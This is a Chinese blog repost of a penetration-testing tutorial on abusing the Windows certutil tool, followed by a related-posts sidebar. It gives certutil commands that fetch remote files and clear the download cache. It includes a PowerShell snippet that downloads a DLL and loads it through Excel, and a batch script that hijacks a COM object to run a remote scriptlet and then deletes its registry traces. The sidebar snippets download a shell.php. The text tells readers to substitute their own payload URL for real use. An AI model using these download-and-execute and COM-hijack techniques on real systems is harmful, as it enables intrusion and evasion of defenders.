certutil在渗透测测试中的使用技巧

已于 2022-03-10 19:14:53 修改
阅读量365 收藏
点赞数
分类专栏: window 文章标签: certutil 渗透测试基础知识
于 2022-03-10 19:06:46 首次发布
原文链接:https://www.cnblogs.com/backlion/p/7325228.html
版权

转发至:https://www.cnblogs.com/backlion/p/7325228.html

一系列渗透测试和开发技巧

作者: 3gstudent
https://github.com/3gstudent/Pentest-and-Development-Tips

0x01 前言

最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充。

0x02 certutil简介

用于备份证书服务管理,支持xp-win10

更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

0x03 渗透测试中的应用

1、downloader

(1) 保存在当前路径,文件名称和下载文件名称相同

certutil -urlcache -split -f https:``//github.com/backlion/demo/blob/master/weblogic.py

img

(2) 保存在当前路径,指定保存文件名称

certutil -urlcache -split -f  https:``//github.com/backlion/demo/blob/master/weblogic.py test.py

img

(3) 保存在缓存目录,名称随机

缓存目录位置: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

certutil -urlcache  -f  https:``//github.com/backlion/demo/blob/master/weblogic.py

img

img

2、清除下载文件副本方法

(1) 方法一,直接删除缓存目录对应文件

如下图:

img

(2)方法二,命令行:

certutil -urlcache  -f  https:``//github.com/backlion/demo/blob/master/weblogic.py delete

img

(3) 补充:

查看缓存项目:

certutil.exe -urlcache *

如下图

img

3、实际测试

(1) powershell中的利用

测试系统安装Office软件,下载执行dll对应的powershell代码如下:

$path=``"D:\test\msg1.dll"` `certutil.exe -urlcache -split -f https:``//raw.githubusercontent.com/3gstudent/test/master/msg.dll $path` `$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(``"Excel.Application"``))` `$excel.RegisterXLL($path)

测试如下图

img

(2) 下载劫持com的sct的批处理文件

test.bat(这里批处理是利用到certutil下载sct文件劫持com弹出计算器):

@echo off` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /ve /t REG_SZ /d C:\WINDOWS\system32\scrobj.dll /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /v ThreadingModel /t REG_SZ /d Apartment /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL /ve /t REG_SZ /d https:``//gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1` `reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1` `certutil 1>nul 2>&1` `reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /f 1>nul 2>&1` `reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /f 1>nul 2>&1` `reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1` `reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /f 1>nul 2>&1` `echo Done!

这里测试的test.scr:

img

注意:在实战中需要替换该批处理文件中地址:

https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct为你自己需要的sct(劫持com)文件

运行批处理如下:

img

4、计算文件hash

(1) SHA1

certutil -hashfile msg1.dll

img

(2) SHA256:

certutil -hashfile msg1.dll SHA256

img

(3) MD5:

certutil -hashfile msg1.dll MD5

img

5、base64编码转换

(1) base64编码:

CertUtil -encode InFile OutFile

img

(2) base64解码

CertUtil -decode InFile OutFile

img

注:

编码后的文件会添加两处标识信息:

文件头:

-----BEGIN CERTIFICATE-----

文件尾:

-----END CERTIFICATE-----

如下图

img

0x04 downloader常用方法

常用的cmd下downloader方法,相比来说,利用certUtil简便快捷,但是使用后需要注意清除缓存,路径如下:

%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

downloader常用方法如下:

· certUtil

· powershell

· csc

· vbs

· JScript

· hta

· bitsadmin

· wget

· debug

· ftp

· ftfp

0x05 小结

本文介绍了certutil在渗透测试中的应用,详细介绍利用certutil作downloader的实现方法和检测方法

转载引用来自于:https://3gstudent.github.io

明月清风~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
certutil.exe
03-04
补充操作系统缺失感染文件!用于Der Spaeher &shy修复
CertUtil的一般渗透
Cupido
09-24 877
简单分析了一下,后门爬虫的可能性比较大,希望大家遇到的时候多注意,毕竟无端的消耗内存。还是被爬取资源都是没必要的事情,此类程序会利用一些系统资源去做免杀和躲避,并且利用批。CertUtil作为win内部存在的一个exe程序,它是有可利用价值的。后来发现自己连接的存储设备经常会自己频繁的向C盘复制文件。处理检查运行情况,自动唤醒病毒程序,处理的时候较为麻烦。前一阵下载了一个应用程序,安装包在某种意义上来说不安全。开机依然发现有脚本自动唤醒。寻着线索找到了这个文件。发现异常后杀了PID。
渗透测试certutil
weixin_33794672的博客
09-13 1350
本文讲的是渗透测试certutil,最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil渗透测试的应用,对cmd下downloader的实现方法作补充,总结base64编码转换的常用方法。 0x01 简介 本文将要介绍以下内容: · certu...
批量识别图片大致不相同图片_批量图片识别工具下载
weixin_31227315的博客
12-24 303
0772boy批量图片识别是一款批量图片识别工具。它需要借助电脑上的certutil.exe程序,将图片的编码保存在TXT文件里,然后再利用百度API进行文字识别,帮助您提取图片上的文字。不过,您在使用时需要注意图片的格式哦~温馨提示Mute模式:在Cfg.dat设置mute=1并保存,然后启动(或重启)程序,则识图过程不弹出进度提示,完成才会弹出提示;设置mute=0则会弹出进度提示。刚运行...
122-记一次渗透测试后引发的小扩展.pdf
09-20
在这里,我们讨论了一次渗透测试后引发的小扩展,主要涉及到certutil和wmic命令的使用,以及如何绕过安全软件的拦截。 首先,作者使用certutil命令来下载文件,但是发现被安全软件拦截。于是,作者尝试了不同的...
使用 certutil 实现 Hex2Bin 和 Base64 加解密的方法
09-21
主要介绍了使用 certutil 实现 Hex2Bin 和 Base64 加解密的方法,需要的朋友可以参考下
利用certutil.exe实现在批处理(bat)嵌入exe文件的方法
09-21
主要介绍了利用certutil.exe实现在批处理(bat)嵌入exe文件的方法,需要的朋友可以参考下
hashcheck:使用Windows CertUtil命令检查文件校验和的Ruby脚本
05-02
布局标题永久链接页自述文件/自述文​​件/哈希检查hashcheck.rb是一个基于Ruby的命令行程序,可使用Windows CertUtil命令检查文件校验和。 安全哈希算法选择为:md2 md4 md5 sha1 sha256 sha384 sha512 $ ruby ...
微信支付Android APP+java+CertUtil.rar
04-22
微信支付,andriod,app ,java ,certUtil ,代码和工具类自己用了可以用,大家可以拿来用
渗透测试常用的文件下载方式总结
qq_32660043的博客
02-24 872
那些常见的文件下载姿势总结。
解决一次由于SSL证书到期导致的网站不能访问的问题(Nginx,php,Apache)
黄树茂博客
12-28 1万+
1. 现象 放假期间收到zabbix报警,提示主站访问不了,报502。 2.排查思路及过程 因为是过年休息,放假前又没有更新,基本可以排除是更新和配置导致的问题。ssh连上服务器发现服务器连接和资源都没问题。这是一套lnamp架构的网站,就是nginx反向代理到Apache,所以考虑是Apache的问题,于是重启httpd服务。 重启httpd服务的时候启动失败,没有看到错误,...
服务器日志事件ID4107
最新发布
携手驰网多多一同探索拥有一台服务器可以做哪些很酷的事情吧~
06-24 553
在 从自动更新 cab 提取第三方的根目录列表失败,错误为: 已处理证书链,但是在不受信任提供程序信任的根证书终止。2、如果缓存是在系统文件,则必须在文件夹选项选择显示隐藏文件和受保护的系统文件,删除以下目录的内容,如果提示没有进入权限,则点继续。
Windows(Win10)自带的可用于文件校验(Hash校验,SHA256校验,MD5校验等)的命令: CertUtil 和 Get-FileHash
kfepiza的博客
02-22 9365
certutil
certutil工具的用法
谢公子的博客
03-23 7412
certutil certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。 远程下载 certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c
关于certutil的探究
mingyqf的博客
01-31 424
原文链接:https://xz.aliyun.com/t/9737#toc-4。
渗透测试常用文件传输方法-Windows篇(如何向Windows服务器上传文件?) (゚益゚メ) 渗透测试
寻觅的博客
04-05 1711
文章目录文件传输certutil 文件传输 文件传输在渗透测试主要用于将攻击载荷上传到目标主机或者获取目标资产使用certutil certutil是Windows内置的一个证书服务的一部分,其有可以被我们利用的下载模块。 # 显示或删除 URL 缓存项目 -URLCache # 分离嵌入的抽象语法标记1(ASN.1)元素,并保存到文件 -URLCache -split -URLCache -f ...
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64编码文件的内容。这是在Windows等效于Linux的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
Windows 10 Certutil使用方法
04-28
Certutil 是 Windows 10 的一个命令行工具,用于管理和操作数字证书。可以使用 Certutil 来安装、卸载、导入、导出和查看数字证书,以及执行其他相关操作。下面是 Certutil使用方法: 1. 安装证书 certutil -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值